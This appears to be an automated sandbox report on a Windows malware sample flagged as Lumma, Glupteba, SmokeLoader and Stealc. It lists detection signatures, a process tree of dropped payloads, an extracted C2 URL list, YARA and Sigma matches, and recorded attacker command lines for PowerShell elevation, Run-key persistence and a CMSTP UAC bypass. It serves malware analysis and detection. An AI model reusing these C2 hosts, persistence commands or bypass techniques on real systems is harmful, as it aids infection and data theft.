Windows Analysis Report
S23UhdW5DH.exe

Overview

General Information

Sample name:S23UhdW5DH.exe
renamed because original name is a hash value
Original sample name:9df4007d210772fc229eefea7f15c06d.exe
Analysis ID:1386724
MD5:9df4007d210772fc229eefea7f15c06d
SHA1:021ae6bce912d6a3fe9435a307eac6b85eb18865
SHA256:1a04a01ff9144cee276994c8a5beda3ebacbc4846afb13b8a700212c1092ef14
Tags:exe, Socks5Systemz

Detection

LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Glupteba
Yara detected SmokeLoader
Yara detected Socks5Systemz
Yara detected Stealc
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Drops PE files with benign system names
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
PE file has a writeable .text section
Performs DNS queries to domains with low reputation
Probes for web service weaknesses (weak passwords or vulnerabilities)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious Process Parents
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to a URL shortener service
Connects to many different domains
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Process Patterns NTDS.DIT Exfil
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses FTP
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • S23UhdW5DH.exe (PID: 5552 cmdline: C:\Users\user\Desktop\S23UhdW5DH.exe MD5: 9DF4007D210772FC229EEFEA7F15C06D)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • FE8B.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\FE8B.exe MD5: E88E0FE2BB602D639E5658C42F34AF2F)
        • WerFault.exe (PID: 2864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 1424 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • 572.exe (PID: 3576 cmdline: C:\Users\user\AppData\Local\Temp\572.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • 572.exe (PID: 524 cmdline: C:\Users\user\AppData\Local\Temp\572.exe MD5: 151E9EC4F0355D2F131B871671BD5E20)
      • 93B.exe (PID: 7144 cmdline: C:\Users\user\AppData\Local\Temp\93B.exe MD5: 1996A23C7C764A77CCACF5808FEC23B0)
      • regsvr32.exe (PID: 5960 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\1199.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
        • regsvr32.exe (PID: 1908 cmdline: /s C:\Users\user\AppData\Local\Temp\1199.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • 1EB9.exe (PID: 1008 cmdline: C:\Users\user\AppData\Local\Temp\1EB9.exe MD5: 82BEB2A060E63C9C9A26663D0103FAE6)
        • 1EB9.tmp (PID: 4200 cmdline: "C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmp" /SL5="$D023E,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" MD5: B0292A40F16BC3D5A1FE839FAC1C825A)
          • 1EB9.exe (PID: 4044 cmdline: "C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E MD5: 82BEB2A060E63C9C9A26663D0103FAE6)
            • 1EB9.tmp (PID: 5268 cmdline: "C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmp" /SL5="$20466,7414031,54272,C:\Users\user\AppData\Local\Temp\1EB9.exe" /SPAWNWND=$10464 /NOTIFYWND=$D023E MD5: B0292A40F16BC3D5A1FE839FAC1C825A)
              • vbsmartcardviewer.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -i MD5: 29DEB5EE2C07F1E8660E10AB6E4A0966)
              • vbsmartcardviewer.exe (PID: 4328 cmdline: "C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe" -s MD5: 29DEB5EE2C07F1E8660E10AB6E4A0966)
      • 356F.exe (PID: 5016 cmdline: C:\Users\user\AppData\Local\Temp\356F.exe MD5: CEAE65EE17FF158877706EDFE2171501)
        • InstallSetup4.exe (PID: 4632 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe" MD5: 28B72E7425D6D224C060D3CF439C668C)
          • BroomSetup.exe (PID: 5724 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 5E94F0F6265F9E8B2F706F1D46BBD39E)
            • cmd.exe (PID: 6336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 416 cmdline: chcp 1251 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • nsx5151.tmp (PID: 5176 cmdline: C:\Users\user\AppData\Local\Temp\nsx5151.tmp MD5: 7C0B88535C506FC8BEC1510F08F3329C)
        • FourthX.exe (PID: 6036 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
          • powershell.exe (PID: 1656 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • FourthX.exe (PID: 6504 cmdline: "C:\Users\user\AppData\Local\Temp\FourthX.exe" MD5: B03886CB64C04B828B6EC1B2487DF4A4)
      • csrss.exe (PID: 6648 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
        • csrss.exe (PID: 3132 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 151E9EC4F0355D2F131B871671BD5E20)
  • rghwvve (PID: 1136 cmdline: C:\Users\user\AppData\Roaming\rghwvve MD5: 9DF4007D210772FC229EEFEA7F15C06D)
  • 93B.exe (PID: 6832 cmdline: "C:\Users\user\AppData\Local\Temp\93B.exe" MD5: 1996A23C7C764A77CCACF5808FEC23B0)
  • svchost.exe (PID: 1432 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 3728 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 2156 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

{"Version": 2022, "C2 list": ["http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\BroomSetup.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Local\Temp\356F.exe | MALWARE_Win_DLInjector04 | Detects downloader / injector | ditekSHen |
  • 0x8ad454:$s1: Runner
  • 0x8ad5b9:$s3: RunOnStartup
  • 0x8ad468:$a1: Antis
  • 0x8ad495:$a2: antiVM
  • 0x8ad49c:$a3: antiSandbox
  • 0x8ad4a8:$a4: antiDebug
  • 0x8ad4b2:$a5: antiEmulator
  • 0x8ad4bf:$a6: enablePersistence
  • 0x8ad4d1:$a7: enableFakeError
  • 0x8ad5e2:$a8: DetectVirtualMachine
  • 0x8ad607:$a9: DetectSandboxie
  • 0x8ad632:$a10: DetectDebugger
  • 0x8ad641:$a11: CheckEmulator

Source | Rule | Description | Author | Strings
00000006.00000002.2412727821.00000000005E8000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
  • 0x70ea:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
  • 0x2a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000000.00000002.2135985424.00000000005B0000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
  • 0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0

Source | Rule | Description | Author | Strings
16.2.93B.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
16.2.93B.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10170:$s2: Elevation:Administrator!new:
10.2.93B.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
10.2.93B.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen |
  • 0x10000:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x100a0:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x10170:$s2: Elevation:Administrator!new:
35.0.BroomSetup.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

                System Summary

                Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\572.exe, ProcessId: 524, TargetFilename: C:\ProgramData\Drivers\csrss.exe
                Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ParentImage: C:\ProgramData\Drivers\csrss.exe, ParentProcessId: 6648, ParentProcessName: csrss.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 3132, ProcessName: csrss.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 6036, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 1656, ProcessName: powershell.exe
                Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\Drivers\csrss.exe" , CommandLine: "C:\ProgramData\Drivers\csrss.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\Drivers\csrss.exe, NewProcessName: C:\ProgramData\Drivers\csrss.exe, OriginalFileName: C:\ProgramData\Drivers\csrss.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\ProgramData\Drivers\csrss.exe" , ProcessId: 6648, ProcessName: csrss.exe
                Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\572.exe, ProcessId: 524, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CSRSS
                Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rghwvve, CommandLine: C:\Users\user\AppData\Roaming\rghwvve, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rghwvve, NewProcessName: C:\Users\user\AppData\Roaming\rghwvve, OriginalFileName: C:\Users\user\AppData\Roaming\rghwvve, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\rghwvve, ProcessId: 1136, ProcessName: rghwvve
                Source: Network Connection, Author: frack113: Data: DestinationIp: 104.17.62.50, DestinationIsIpv6: false, DestinationPort: 465, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\572.exe, Initiated: true, ProcessId: 524, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 52506
                Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rghwvve, CommandLine: C:\Users\user\AppData\Roaming\rghwvve, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rghwvve, NewProcessName: C:\Users\user\AppData\Roaming\rghwvve, OriginalFileName: C:\Users\user\AppData\Roaming\rghwvve, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\rghwvve, ProcessId: 1136, ProcessName: rghwvve
                Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Drivers\csrss.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\572.exe, ProcessId: 524, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS
                Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, CommandLine|base64offset|contains: J, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\FourthX.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\FourthX.exe, ParentProcessId: 6036, ParentProcessName: FourthX.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs, ProcessId: 1656, ProcessName: powershell.exe
                Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 1432, ProcessName: svchost.exe
                Timestamp:02/05/24-12:12:18.420413
                Source IP:192.168.2.6
                Destination IP:91.215.85.120
                SID:2039103
                Source Port:49706
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                AV Detection

                Source: S23UhdW5DH.exe, Avira: detected
                Source: https://secretionsuitcasenioise.shop/apib, Avira URL Cloud: Label: malware
                Source: 00000000.00000002.2137132146.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}
                Source: selebration17io.io, Virustotal: Detection: 12%
                Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe, ReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exe, ReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, ReversingLabs: Detection: 51%
                Source: C:\Users\user\AppData\Local\Temp\356F.exe, ReversingLabs: Detection: 91%
                Source: C:\Users\user\AppData\Local\Temp\93B.exe, ReversingLabs: Detection: 86%
                Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, ReversingLabs: Detection: 21%
                Source: C:\Users\user\AppData\Local\Temp\FE8B.exe, ReversingLabs: Detection: 50%
                Source: C:\Users\user\AppData\Local\Temp\FourthX.exe, ReversingLabs: Detection: 87%
                Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe, ReversingLabs: Detection: 60%
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp, ReversingLabs: Detection: 34%
                Source: C:\Users\user\AppData\Roaming\rghwvve, ReversingLabs: Detection: 44%
                Source: S23UhdW5DH.exe, ReversingLabs: Detection: 44%
                Source: S23UhdW5DH.exe, Virustotal: Detection: 52%
                Source: Yara match, File source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
                Source: C:\ProgramData\Drivers\csrss.exe, Joe Sandbox ML: detected
                Source: C:\ProgramData\ObjectSerialization65\ObjectSerialization65.exe, Joe Sandbox ML: detected
                Source: S23UhdW5DH.exe, Joe Sandbox ML: detected
                Source: 572.exe, 00000009.00000003.2642497062.00000000046D1000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: -----BEGIN RSA PUBLIC KEY-----memstr_8e75bb10-7

                Exploits

                Source: Yara match, File source: 16.2.93B.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 10.2.93B.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000010.00000002.2462205844.0000000000413000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY

                Privilege Escalation

                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, Registry value created: DelegateExecute
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, Registry value created: NULL "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

                Bitcoin Miner

                Source: Yara match, File source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.2f50e67.11.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000001E.00000002.2687018524.0000000003393000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000001E.00000002.2677016530.0000000000843000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY

                Compliance

                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe, Unpacked PE file: 26.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe, Unpacked PE file: 29.2.vbsmartcardviewer.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe, Unpacked PE file: 30.2.288c47bbc1871b439df19ff4df68f076.exe.400000.4.unpack
                Source: C:\Users\user\AppData\Local\Temp\nsx5151.tmp, Unpacked PE file: 43.2.nsx5151.tmp.400000.0.unpack
                Source: S23UhdW5DH.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\S23UhdW5DH.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: unknownHTTPS traffic detected: 104.21.5.25:443 -> 192.168.2.6:55712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.200.3.224:443 -> 192.168.2.6:54872 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 82.221.28.171:443 -> 192.168.2.6:54892 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:54614 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.241.203.30:443 -> 192.168.2.6:54853 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.66.43.117:443 -> 192.168.2.6:55111 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.183.63.241:443 -> 192.168.2.6:54618 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 3.161.136.69:443 -> 192.168.2.6:54594 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.108.110.164:443 -> 192.168.2.6:52157 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.60.0.44:443 -> 192.168.2.6:54890 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 54.158.51.60:443 -> 192.168.2.6:55107 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.249.120.86:443 -> 192.168.2.6:54874 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 184.25.164.103:443 -> 192.168.2.6:55115 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 41.33.126.100:443 -> 192.168.2.6:54857 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.148.124:443 -> 192.168.2.6:55242 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.105.84:443 -> 192.168.2.6:55173 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 64.91.249.20:443 -> 192.168.2.6:55187 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 195.248.251.103:443 -> 192.168.2.6:54596 version: TLS 1.2
